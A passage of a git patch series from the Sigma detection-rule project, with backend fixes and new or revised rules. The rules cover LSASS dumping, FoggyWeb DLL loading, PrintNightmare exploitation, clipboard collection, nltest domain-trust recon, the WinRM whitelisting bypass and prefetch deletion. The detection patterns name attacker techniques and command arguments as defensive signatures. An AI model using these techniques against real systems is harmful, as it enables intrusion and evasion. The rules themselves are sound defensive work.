backend_dict.items(): update_dict(the_dico,result,name) #Save -cover = pathlib.Path("sigmacover.yml") -with cover.open("w") as f: - ruyaml.dump(the_dico, f, Dumper=ruyaml.RoundTripDumper) - +if cmdargs.target.lower() == "yaml": + cover = pathlib.Path("sigmacover.yml") + with cover.open("w") as file: + ruyaml.dump(the_dico, file, Dumper=ruyaml.RoundTripDumper) +else: + cover = pathlib.Path("sigmacover.json") + with cover.open("w") as file: + json_dumps_str = json.dumps(the_dico, indent=4) + file.write(json_dumps_str) From 6a2785492da90e03c0612790dfcdb557c2b5014f Mon Sep 17 00:00:00 2001 From: zakibro <48967550+zakibro@users.noreply.github.com> Date: Mon, 27 Sep 2021 07:59:43 +0200 Subject: [PATCH 1117/1367] Update lnx_auditd_clipboard_collection.yml Changes after suggestion. --- .../lnx_auditd_clipboard_collection.yml | 20 +++++++++++-------- 1 file changed, 12 insertions(+), 8 deletions(-) diff --git a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml index 4f5f3a00..643168b4 100644 --- a/rules/linux/auditd/lnx_auditd_clipboard_collection.yml +++ b/rules/linux/auditd/lnx_auditd_clipboard_collection.yml @@ -12,16 +12,20 @@ logsource: product: linux service: auditd detection: - xclip: - type: EXECVE - a0: xclip - a1: '-selection' - a2: clipboard - a3: '-o' - condition: xclip + xclip: + type: EXECVE + a0: xclip + a1: + - '-selection' + - '-sel' + a2: + - clipboard + - clip + a3: '-o' + condition: xclip tags: - attack.collection - attack.t1115 falsepositives: - Legitimate usage of xclip tools -level: low \ No newline at end of file +level: low From 6782a7af4d119c999bce62328700441cc13a3e65 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 09:27:01 +0200 Subject: [PATCH 1118/1367] fix TargetUserName and TargetUserSid for detection --- tools/config/winlogbeat-modules-enabled.yml | 8 ++------ 1 file changed, 2 insertions(+), 6 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index d46dd205..f3c48790 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -468,12 +468,8 @@ fieldmappings: TargetOutboundUserName: winlog.event_data.TargetOutboundUserName TargetServerName: winlog.event_data.TargetServerName TargetSid: winlog.event_data.TargetSid - TargetUserName: - service=security: user.name - default: winlog.event_data.TargetUserName - TargetUserSid: - service=security: user.id - default: winlog.event_data.TargetUserSid + TargetUserName: winlog.event_data.TargetUserName + TargetUserSid: winlog.event_data.TargetUserSid TaskContent: winlog.event_data.TaskContent TaskName: winlog.event_data.TaskName TicketEncryptionType: winlog.event_data.TicketEncryptionType From 5ef1c913cf30ab9da66395a281c56af5068fbe8f Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 18:33:57 +0200 Subject: [PATCH 1119/1367] fix: wrong condition https://github.com/SigmaHQ/sigma/issues/2089 --- rules/windows/builtin/win_susp_lsass_dump_generic.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/builtin/win_susp_lsass_dump_generic.yml b/rules/windows/builtin/win_susp_lsass_dump_generic.yml index afe1ef75..2856705c 100644 --- a/rules/windows/builtin/win_susp_lsass_dump_generic.yml +++ b/rules/windows/builtin/win_susp_lsass_dump_generic.yml @@ -62,7 +62,7 @@ detection: filter2: ProcessName|startswith: - 'C:\Program Files' # too many false positives with legitimate AV and EDR solutions - condition: selection_1 or selection_2 and not filter1 and not filter2 + condition: ( selection_1 or selection_2 ) and not filter1 and not filter2 fields: - ComputerName - SubjectDomainName From a0b48b96d4afe4b2f244d00c18f5b5eacb44dd48 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 18:49:58 +0200 Subject: [PATCH 1120/1367] Fix 'NoneType' object has no attribute 'lower' --- tools/sigma/backends/sysmon.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index ce1524e6..852bd173 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py @@ -217,7 +217,7 @@ class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): raise NotSupportedError( "Not supported logsource. Should be product `windows`.") for item in self.logsource.values(): - if item.lower() in self.allowedSource.keys(): + if str(item).lower() in self.allowedSource.keys(): self.table = self.allowedSource.get(item.lower()) break else: From bcf40fa4e4201cd7677054eda47c6b07515f0d31 Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 18:59:05 +0200 Subject: [PATCH 1121/1367] Fix logsource not a string --- rules/windows/builtin/win_susp_logon_explicit_credentials.yml | 1 - rules/windows/other/win_lateral_movement_condrv.yml | 1 - tests/test_rules.py | 3 +++ 3 files changed, 3 insertions(+), 2 deletions(-) diff --git a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml index e947b6ae..595a5742 100644 --- a/rules/windows/builtin/win_susp_logon_explicit_credentials.yml +++ b/rules/windows/builtin/win_susp_logon_explicit_credentials.yml @@ -13,7 +13,6 @@ tags: logsource: product: windows service: security - definition: detection: selection: EventID: 4648 diff --git a/rules/windows/other/win_lateral_movement_condrv.yml b/rules/windows/other/win_lateral_movement_condrv.yml index 796b506f..6bade50a 100644 --- a/rules/windows/other/win_lateral_movement_condrv.yml +++ b/rules/windows/other/win_lateral_movement_condrv.yml @@ -15,7 +15,6 @@ tags: logsource: product: windows service: security - definition: detection: selection: EventID: 4674 diff --git a/tests/test_rules.py b/tests/test_rules.py index b715e20e..370e944b 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -613,6 +613,9 @@ class TestRules(unittest.TestCase): if key.lower() not in valid_logsource: print(Fore.RED + "Rule {} has a logsource with an invalid field ({})".format(file, key)) valid = False + elif not isinstance(logsource[key],str): + print(Fore.RED + "Rule {} has a logsource with an invalid field type ({})".format(file, key)) + valid = False if not valid: faulty_rules.append(file) From bcdf164b4ca32c2c8448e46e9d81efb3fb069eaf Mon Sep 17 00:00:00 2001 From: frack113 Date: Mon, 27 Sep 2021 19:17:14 +0200 Subject: [PATCH 1122/1367] fix space --- tools/sigma/backends/sysmon.py | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/tools/sigma/backends/sysmon.py b/tools/sigma/backends/sysmon.py index 852bd173..3b592525 100644 --- a/tools/sigma/backends/sysmon.py +++ b/tools/sigma/backends/sysmon.py @@ -217,7 +217,7 @@ class SysmonConfigBackend(SingleTextQueryBackend, MultiRuleOutputMixin): raise NotSupportedError( "Not supported logsource. Should be product `windows`.") for item in self.logsource.values(): - if str(item).lower() in self.allowedSource.keys(): + if str(item).lower() in self.allowedSource.keys(): self.table = self.allowedSource.get(item.lower()) break else: From 0f3b169c45af89dac72490766a1593ab8a5df3cb Mon Sep 17 00:00:00 2001 From: Joshua Roys Date: Mon, 27 Sep 2021 15:01:32 -0400 Subject: [PATCH 1123/1367] Implement "near" support for ALA/Sentinel --- tools/sigma/backends/ala.py | 76 ++++++++++++++++++++++++++++++++++--- 1 file changed, 71 insertions(+), 5 deletions(-) diff --git a/tools/sigma/backends/ala.py b/tools/sigma/backends/ala.py index ef90618c..724973d7 100644 --- a/tools/sigma/backends/ala.py +++ b/tools/sigma/backends/ala.py @@ -25,7 +25,7 @@ from uuid import uuid4 from sigma.config.mapping import ( SimpleFieldMapping, MultiFieldMapping, ConditionalFieldMapping ) -from sigma.parser.condition import SigmaAggregationParser +from sigma.parser.condition import SigmaAggregationParser, SigmaConditionParser, SigmaConditionTokenizer from sigma.parser.modifiers.type import SigmaRegularExpressionModifier from sigma.backends.base import SingleTextQueryBackend @@ -82,6 +82,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): self.service = None self.table = None self.eventid = None + self.tableAggJoinFields = None + self.tableAggTimeField = None self._parser = None self._fields = None self._agg_var = None @@ -142,6 +144,8 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): "CommandLine"}) == 0: self.table = "SecurityEvent | where EventID == 4688 " self.eventid = "4688" + self.tableAggJoinFields = "SubjectLogonId, Computer" + self.tableAggTimeField = "TimeGenerated" elif self.category == "process_creation": self.table = "SysmonEvent" self.eventid = "1" @@ -219,6 +223,12 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): # before = "%s | where EventID == \"%s\" | where " % (self.table, self.eventid) else: before = "%s | where " % self.table + if parsed.parsedAgg != None and parsed.parsedAgg.aggfunc == SigmaAggregationParser.AGGFUNC_NEAR: + window = parsed.parsedAgg.parser.parsedyaml["detection"].get("timeframe", "30m") + before = """ + let lookupWindow = %s; + let lookupBin = lookupWindow / 2.0; + """ % (window) + before return before def generateMapItemNode(self, node): @@ -294,14 +304,70 @@ class AzureLogAnalyticsBackend(SingleTextQueryBackend): except KeyError: raise NotImplementedError("Type modifier '{}' is not supported by backend".format(node.identifier)) + def generateAggregationQuery(self, agg, searchId): + condtoken = SigmaConditionTokenizer(searchId) + condparsed = SigmaConditionParser(agg.parser, condtoken) + backend = AzureLogAnalyticsBackend(agg.config) + + # these bits from generate() should be moved to __init__ + try: + backend.category = agg.parser.parsedyaml['logsource'].setdefault('category', None) + backend.product = agg.parser.parsedyaml['logsource'].setdefault('product', None) + backend.service = agg.parser.parsedyaml['logsource'].setdefault('service', None) + except KeyError: + backend.category = None + backend.product = None + backend.service = None + backend.getTable(agg.parser) + + query = backend.generateQuery(condparsed) + before = backend.generateBefore(condparsed) + return before + query + + # follow the join/time window pattern + # https://docs.microsoft.com/en-us/azure/data-explorer/kusto/query/join-timewindow + def generateNear(self, agg): + includeQueries = [] + + includeCount = 0 + for includeCount, include in enumerate(agg.include, start=1): + iq = self.generateAggregationQuery(agg, include) + iq += """ + | extend End{timeIndex}={timeField}, + TimeKey = range( + bin({timeField} - lookupWindow, lookupBin), + bin({timeField}, lookupBin), + lookupBin) + | mv-expand TimeKey to typeof(datetime)""".format( + timeField=self.tableAggTimeField, + timeIndex=includeCount, + ) + includeQueries.append(iq) + + ret = " | extend Start={timeField}, TimeKey = bin({timeField}, lookupBin) | join kind=inner (\n ".format( + timeField=self.tableAggTimeField, + ) + ret += ") on {joinFields}, TimeKey | join kind=inner (\n ".format( + joinFields=self.tableAggJoinFields, + ).join(includeQueries) + ret += ") on {joinFields}, TimeKey\n| where ".format( + joinFields=self.tableAggJoinFields, + ) + ret += " and ".join([ + "(End%d - Start) between (0min .. lookupWindow)" % (endIndex + 1) for endIndex in range(includeCount) + ]) + + return ret + def generateAggregation(self, agg): if agg is None: return "" if agg.aggfunc == SigmaAggregationParser.AGGFUNC_NEAR: - raise NotImplementedError( - "The 'near' aggregation operator is not " - + f"implemented for the %s backend" % self.identifier - ) + if agg.exclude: + raise NotSupportedError("This backend doesn't currently support 'near' with excludes") + if self.tableAggJoinFields == None or self.tableAggTimeField == None: + raise NotSupportedError("This backend doesn't currently support 'near' for this table") + return self.generateNear(agg) if agg.aggfunc_notrans != 'count' and agg.aggfield is None: raise NotSupportedError( "The '%s' aggregation operator " % agg.aggfunc_notrans From 97bb6a02572d13aa252ad5d96e9b67c09397e1ab Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:28:25 +0200 Subject: [PATCH 1124/1367] rule: NOBELIUM FoggyWeb --- .../image_load/sysmon_foggyweb_nobelium.yml | 18 ++++++++++++++++++ 1 file changed, 18 insertions(+) create mode 100644 rules/windows/image_load/sysmon_foggyweb_nobelium.yml diff --git a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml new file mode 100644 index 00000000..cb827bb8 --- /dev/null +++ b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml @@ -0,0 +1,18 @@ +title: FoggyWeb Backdoor DLL Loading +id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c +status: experimental +description: Detects DLL image load events as seen in FoggyWeb infections +references: + - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ +author: Florian Roth +date: 2021/09/27 +logsource: + category: image_load + product: windows +detection: + selection: + Image: C:\Windows\ADFS\version.dll + condition: selection +falsepositives: + - Unlikely +level: critical From cee44e6688800bfa90463b161689fda6e5a695e5 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:33:30 +0200 Subject: [PATCH 1125/1367] renamed files: lowercase --- ...it_cve_2021_1675_printspooler_security.yml | 26 ++++++++++ .../builtin/win_gpo_scheduledtasks.yml | 29 +++++++++++ .../win_exchange_transportagent_failed.yml | 25 ++++++++++ .../process_creation_sdelete.yml | 32 +++++++++++++ .../process_creation/win_susp_vboxdrvinst.yml | 31 ++++++++++++ .../win_susp_winrm_awl_bypass.yml | 48 +++++++++++++++++++ 6 files changed, 191 insertions(+) create mode 100644 rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml create mode 100644 rules/windows/builtin/win_gpo_scheduledtasks.yml create mode 100644 rules/windows/other/win_exchange_transportagent_failed.yml create mode 100644 rules/windows/process_creation/process_creation_sdelete.yml create mode 100644 rules/windows/process_creation/win_susp_vboxdrvinst.yml create mode 100644 rules/windows/process_creation/win_susp_winrm_awl_bypass.yml diff --git a/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml new file mode 100644 index 00000000..d36b0ea4 --- /dev/null +++ b/rules/windows/builtin/win_exploit_cve_2021_1675_printspooler_security.yml @@ -0,0 +1,26 @@ +title: CVE-2021-1675 Print Spooler Exploitation IPC Access +id: 8fe1c584-ee61-444b-be21-e9054b229694 +description: Detects remote printer driver load from Detailed File Share in Security logs that are a sign of successful exploitation attempts against print spooler vulnerability CVE-2021-1675 and CVE-2021-34527 +author: INIT_6 +status: experimental +level: critical +references: + - https://twitter.com/INIT_3/status/1410662463641731075 + - https://nvd.nist.gov/vuln/detail/cve-2021-1675 + - https://nvd.nist.gov/vuln/detail/cve-2021-34527 +date: 2021/07/02 +tags: + - attack.execution +logsource: + product: windows + service: security +detection: + selection: + EventID: '5145' + ShareName: '\\\*\IPC$' + RelativeTargetName: 'spoolss' + AccessMask: '0x3' + ObjectType: 'File' + condition: selection +falsepositives: + - nothing observed so far diff --git a/rules/windows/builtin/win_gpo_scheduledtasks.yml b/rules/windows/builtin/win_gpo_scheduledtasks.yml new file mode 100644 index 00000000..669bcdaa --- /dev/null +++ b/rules/windows/builtin/win_gpo_scheduledtasks.yml @@ -0,0 +1,29 @@ +title: Persistence and Execution at Scale via GPO Scheduled Task +id: a8f29a7b-b137-4446-80a0-b804272f3da2 +description: Detect lateral movement using GPO scheduled task, usually used to deploy ransomware at scale +author: Samir Bousseaden +date: 2019/04/03 +references: + - https://twitter.com/menasec1/status/1106899890377052160 + - https://www.secureworks.com/blog/ransomware-as-a-distraction +tags: + - attack.persistence + - attack.lateral_movement + - attack.t1053 # an old one + - attack.t1053.005 +logsource: + product: windows + service: security + definition: 'The advanced audit policy setting "Object Access > Audit Detailed File Share" must be configured for Success/Failure' +detection: + selection: + EventID: 5145 + ShareName: \\*\SYSVOL + RelativeTargetName|endswith: 'ScheduledTasks.xml' + Accesses|contains: + - 'WriteData' + - '%%4417' + condition: selection +falsepositives: + - if the source IP is not localhost then it's super suspicious, better to monitor both local and remote changes to GPO scheduledtasks +level: high diff --git a/rules/windows/other/win_exchange_transportagent_failed.yml b/rules/windows/other/win_exchange_transportagent_failed.yml new file mode 100644 index 00000000..2a68a841 --- /dev/null +++ b/rules/windows/other/win_exchange_transportagent_failed.yml @@ -0,0 +1,25 @@ +title: Failed MSExchange Transport Agent Installation +id: c7d16cae-aaf3-42e5-9c1c-fb8553faa6fa +status: experimental +description: Detects a failed installation of a Exchange Transport Agent +references: + - https://twitter.com/blueteamsec1/status/1401290874202382336?s=20 +tags: + - attack.persistence + - attack.t1505.002 +author: Tobias Michalski +date: 2021/06/08 +logsource: + service: msexchange-management + product: windows +detection: + selection: + EventID: 6 + keywords: + - 'Install-TransportAgent' + condition: selection and keywords +fields: + - AssemblyPath +falsepositives: + - legitimate installations of exchange TransportAgents. AssemblyPath is a good indicator for this. +level: high diff --git a/rules/windows/process_creation/process_creation_sdelete.yml b/rules/windows/process_creation/process_creation_sdelete.yml new file mode 100644 index 00000000..78d44427 --- /dev/null +++ b/rules/windows/process_creation/process_creation_sdelete.yml @@ -0,0 +1,32 @@ +title: Sysinternals SDelete Delete File +id: a4824fca-976f-4964-b334-0621379e84c4 +status: experimental +author: frack113 +date: 2021/06/03 +description: Use of SDelete to erase a file not the free space +references: + - https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1485/T1485.md +tags: + - attack.impact + - attack.t1485 +logsource: + category: process_creation + product: windows +detection: + selection: + OriginalFileName: sdelete.exe + filter: + CommandLine|contains: + - ' -h' + - ' -c' + - ' -z' + - ' /?' + condition: selection and not filter +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - System administrator Usage +level: medium diff --git a/rules/windows/process_creation/win_susp_vboxdrvinst.yml b/rules/windows/process_creation/win_susp_vboxdrvinst.yml new file mode 100644 index 00000000..9b1eacab --- /dev/null +++ b/rules/windows/process_creation/win_susp_vboxdrvinst.yml @@ -0,0 +1,31 @@ +title: Suspicious VBoxDrvInst.exe Parameters +id: b7b19cb6-9b32-4fc4-a108-73f19acfe262 +description: Detect VBoxDrvInst.exe run with parameters allowing processing INF file. This allows to create values in the registry and install drivers. + For example one could use this technique to obtain persistence via modifying one of Run or RunOnce registry keys +status: experimental +author: Konstantin Grishchenko, oscd.community +date: 2020/10/06 +references: + - https://github.com/LOLBAS-Project/LOLBAS/blob/master/yml/LOLUtilz/OtherBinaries/VBoxDrvInst.yml + - https://twitter.com/pabraeken/status/993497996179492864 +tags: + - attack.defense_evasion + - attack.t1112 +logsource: + category: process_creation + product: windows +detection: + selection: + Image|endswith: '\VBoxDrvInst.exe' + CommandLine|contains|all: + - 'driver' + - 'executeinf' + condition: selection +fields: + - ComputerName + - User + - CommandLine + - ParentCommandLine +falsepositives: + - Legitimate use of VBoxDrvInst.exe utility by VirtualBox Guest Additions installation process +level: medium diff --git a/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml new file mode 100644 index 00000000..fd21e69f --- /dev/null +++ b/rules/windows/process_creation/win_susp_winrm_awl_bypass.yml @@ -0,0 +1,48 @@ +action: global +title: AWL Bypass with Winrm.vbs and Malicious WsmPty.xsl/WsmTxt.xsl +description: Detects execution of attacker-controlled WsmPty.xsl or WsmTxt.xsl via winrm.vbs and copied cscript.exe (can be renamed) +status: experimental +references: + - https://posts.specterops.io/application-whitelisting-bypass-and-arbitrary-unsigned-code-execution-technique-in-winrm-vbs-c8c24fb40404 +author: Julia Fomina, oscd.community +date: 2020/10/06 +tags: + - attack.defense_evasion + - attack.t1216 +level: medium +falsepositives: + - Unlikely +--- +id: 074e0ded-6ced-4ebd-8b4d-53f55908119d +logsource: + category: process_creation + product: windows +detection: + contains_format_pretty_arg: + CommandLine|contains: + - 'format:pretty' + - 'format:"pretty"' + - 'format:"text"' + - 'format:text' + image_from_system_folder: + Image|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + contains_winrm: + CommandLine|contains: 'winrm' + condition: contains_winrm and (contains_format_pretty_arg and not image_from_system_folder) +--- +id: d353dac0-1b41-46c2-820c-d7d2561fc6ed +logsource: + product: windows + category: file_event +detection: + system_files: + TargetFilename|endswith: + - 'WsmPty.xsl' + - 'WsmTxt.xsl' + in_system_folder: + TargetFilename|startswith: + - 'C:\Windows\System32\' + - 'C:\Windows\SysWOW64\' + condition: system_files and not in_system_folder From b227f8459dbe2027948c55a3fbcbc8ac84cfc1b7 Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 22:37:20 +0200 Subject: [PATCH 1126/1367] fix: typo in filename --- ...ation_apt_slingshot.yml => process_creation_apt_slingshot.yml} | 0 1 file changed, 0 insertions(+), 0 deletions(-) rename rules/windows/process_creation/{proces_creation_apt_slingshot.yml => process_creation_apt_slingshot.yml} (100%) diff --git a/rules/windows/process_creation/proces_creation_apt_slingshot.yml b/rules/windows/process_creation/process_creation_apt_slingshot.yml similarity index 100% rename from rules/windows/process_creation/proces_creation_apt_slingshot.yml rename to rules/windows/process_creation/process_creation_apt_slingshot.yml From 4161cd909fe3e454616f3e75fa9bdbc6d687d91b Mon Sep 17 00:00:00 2001 From: Florian Roth Date: Mon, 27 Sep 2021 23:12:18 +0200 Subject: [PATCH 1127/1367] docs: changed description --- rules/windows/image_load/sysmon_foggyweb_nobelium.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml index cb827bb8..81bbdf87 100644 --- a/rules/windows/image_load/sysmon_foggyweb_nobelium.yml +++ b/rules/windows/image_load/sysmon_foggyweb_nobelium.yml @@ -1,7 +1,7 @@ title: FoggyWeb Backdoor DLL Loading id: 640dc51c-7713-4faa-8a0e-e7c0d9d4654c status: experimental -description: Detects DLL image load events as seen in FoggyWeb infections +description: Detects DLL image load activity as used by FoggyWeb backdoor loader references: - https://www.microsoft.com/security/blog/2021/09/27/foggyweb-targeted-nobelium-malware-leads-to-persistent-backdoor/ author: Florian Roth From 3e7b3073cf3a6b9ffea51603df4271405f77700a Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 27 Sep 2021 23:30:30 -0500 Subject: [PATCH 1128/1367] Update win_sysmon_driver_unload.yml --- rules/windows/process_creation/win_sysmon_driver_unload.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_sysmon_driver_unload.yml b/rules/windows/process_creation/win_sysmon_driver_unload.yml index a0b9258b..505f7d95 100644 --- a/rules/windows/process_creation/win_sysmon_driver_unload.yml +++ b/rules/windows/process_creation/win_sysmon_driver_unload.yml @@ -4,7 +4,7 @@ status: experimental author: Kirill Kiryanov, oscd.community description: Detect possible Sysmon driver unload date: 2019/10/23 -modified: 2020/08/29 +modified: 2021/09/27 references: - https://www.darkoperator.com/blog/2018/10/5/operating-offensively-against-sysmon logsource: @@ -13,6 +13,8 @@ logsource: tags: - attack.defense_evasion - attack.t1070 + - attack.t1562 + - attack.t1562.002 detection: selection: Image|endswith: '\fltmc.exe' From 0d07a78a2da137412d14baf921a4653f0121cf5b Mon Sep 17 00:00:00 2001 From: Austin Songer Date: Mon, 27 Sep 2021 23:41:19 -0500 Subject: [PATCH 1129/1367] Update aws_attached_malicious_lambda_layer.yml --- rules/cloud/aws/aws_attached_malicious_lambda_layer.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml index 39c92d70..7c97e8d2 100644 --- a/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml +++ b/rules/cloud/aws/aws_attached_malicious_lambda_layer.yml @@ -13,7 +13,7 @@ detection: eventSource: lambda.amazonaws.com eventName: UpdateFunctionConfiguration condition: selection -level: low +level: medium tags: - attack.privilege_escalation falsepositives: From 11dc2761855c162110733882bb4ef1da6906c96b Mon Sep 17 00:00:00 2001 From: frack113 Date: Tue, 28 Sep 2021 10:33:10 +0200 Subject: [PATCH 1130/1367] Update filter help --- tools/sigma/sigmac.py | 6 +++++- 1 file changed, 5 insertions(+), 1 deletion(-) diff --git a/tools/sigma/sigmac.py b/tools/sigma/sigmac.py index 52b04a24..27f07a0c 100755 --- a/tools/sigma/sigmac.py +++ b/tools/sigma/sigmac.py @@ -98,12 +98,16 @@ def set_argparser(): argparser.add_argument("--recurse", "-r", action="store_true", help="Use directory as input (recurse into subdirectories is not implemented yet)") argparser.add_argument("--filter", "-f", help=""" Define comma-separated filters that must match (AND-linked) to rule to be processed. - Valid filters: level<=x, level>=x, level=x, status=y, logsource=z, tag=t. + Valid filters: level<=x, level>=x, level=x, status=y, logsource=z, tag=t, target=o. x is one of: low, medium, high, critical. y is one of: experimental, testing, stable. z is a word appearing in an arbitrary log source attribute. t is a tag that must appear in the rules tag list, case-insensitive matching. + o is a target that must appear in the rules target list, case-insensitive matching. Multiple log source specifications are AND linked. + Special filter: + inlastday=X rule create or modified in the last X days period + tlp=valid_tlp if rule have no tlp set to WHITE """) argparser.add_argument("--target", "-t", choices=backends.getBackendDict().keys(), help="Output target format") argparser.add_argument("--lists", "-l", action="store_true", help="List available output target formats and configurations") From a2418e4d2cadeefa3b6a7bb639a92ff0872b89ca Mon Sep 17 00:00:00 2001 From: zaicurity <59199225+zaicurity@users.noreply.github.com> Date: Tue, 28 Sep 2021 17:39:21 +0200 Subject: [PATCH 1131/1367] Added alternative command parameter Added the command parameter '/trusted_domains' for nltest which can be used as an alternative to '/domain_trusts' to bypass detection. Tested on Windows 10.0.19042 Reference: https://www.harmj0y.net/blog/redteaming/a-guide-to-attacking-domain-trusts/ --- rules/windows/process_creation/win_nltest_recon.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/rules/windows/process_creation/win_nltest_recon.yml b/rules/windows/process_creation/win_nltest_recon.yml index 46985f8e..a08640d0 100644 --- a/rules/windows/process_creation/win_nltest_recon.yml +++ b/rules/windows/process_creation/win_nltest_recon.yml @@ -30,6 +30,7 @@ detection: - '/dclist:' - '/parentdomain' - '/domain_trusts' + - '/trusted_domains' - '/user' condition: selection_nltest and (selection_recon1 or selection_recon2) falsepositives: From 4a66ea04bd7d3ddcbb453d12770beadf9c0f8e0e Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 29 Sep 2021 08:26:05 +0200 Subject: [PATCH 1132/1367] fix tags --- rules/windows/process_creation/win_susp_mpcmdrun_download.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/process_creation/win_susp_mpcmdrun_download.yml b/rules/windows/process_creation/win_susp_mpcmdrun_download.yml index 4dd0c5d2..5265dd13 100644 --- a/rules/windows/process_creation/win_susp_mpcmdrun_download.yml +++ b/rules/windows/process_creation/win_susp_mpcmdrun_download.yml @@ -9,7 +9,7 @@ references: - https://lolbas-project.github.io/lolbas/Binaries/MpCmdRun/ tags: - attack.defense_evasion - - attack.t1218.010 + - attack.t1218 - attack.command_and_control - attack.t1105 logsource: From 424b0263dfb426c853d258c8c2fd3d4c95a100b3 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 29 Sep 2021 08:53:22 +0200 Subject: [PATCH 1133/1367] add EventID 26 --- tools/config/generic/sysmon.yml | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/tools/config/generic/sysmon.yml b/tools/config/generic/sysmon.yml index a5aaac02..da857d68 100644 --- a/tools/config/generic/sysmon.yml +++ b/tools/config/generic/sysmon.yml @@ -143,7 +143,9 @@ logsources: category: file_delete product: windows conditions: - EventID: 23 + EventID: + - 23 + - 26 rewrite: product: windows service: sysmon From d3fc6b118de3173f41e5a2a3974ec89ee13eabed Mon Sep 17 00:00:00 2001 From: kidrek Date: Wed, 29 Sep 2021 09:42:17 +0200 Subject: [PATCH 1134/1367] Add new rule - sysmon_delete_prefetch - AntiForensic --- .../file_delete/sysmon_delete_prefetch.yml | 23 +++++++++++++++++++ 1 file changed, 23 insertions(+) create mode 100755 rules/windows/file_delete/sysmon_delete_prefetch.yml diff --git a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml new file mode 100755 index 00000000..013db199 --- /dev/null +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -0,0 +1,23 @@ +title: Prefetch file deletion (AntiForensic) +id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 +status: experimental +description: Detects the deletion of a prefetch file (AntiForensic) +level: high +author: Cedric MAURUGEON +date: 2021/09/29 +tags: + - attack.defense_evasion + - attack.t1070.004 +logsource: + product: windows + category: file_delete +detection: + selection: + TargetFilename|startswith: 'C:\Windows\Prefetch\' + TargetFilename|endswith: '.pf' + exception: + Image: 'C:\windows\system32\svchost.exe' + User: 'NT AUTHORITY\SYSTEM' + condition: selection and not exception +falsepositives: + - Unknown From da4a8a0ffdbe1ae7288141bd1cd4de4b0504f6d4 Mon Sep 17 00:00:00 2001 From: kidrek Date: Wed, 29 Sep 2021 09:49:58 +0200 Subject: [PATCH 1135/1367] Fix title field error --- rules/windows/file_delete/sysmon_delete_prefetch.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/rules/windows/file_delete/sysmon_delete_prefetch.yml b/rules/windows/file_delete/sysmon_delete_prefetch.yml index 013db199..be238a8f 100755 --- a/rules/windows/file_delete/sysmon_delete_prefetch.yml +++ b/rules/windows/file_delete/sysmon_delete_prefetch.yml @@ -1,4 +1,4 @@ -title: Prefetch file deletion (AntiForensic) +title: Prefetch file deletion id: 0a1f9d29-6465-4776-b091-7f43b26e4c89 status: experimental description: Detects the deletion of a prefetch file (AntiForensic) From 17ad95cd12a43605165d0819b2b2addef64ef818 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 29 Sep 2021 10:58:00 +0200 Subject: [PATCH 1136/1367] Update sysmon_delete_prefetch.yml --- rules/windows/file_delete/sysmon_delete_prefetch.yml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git 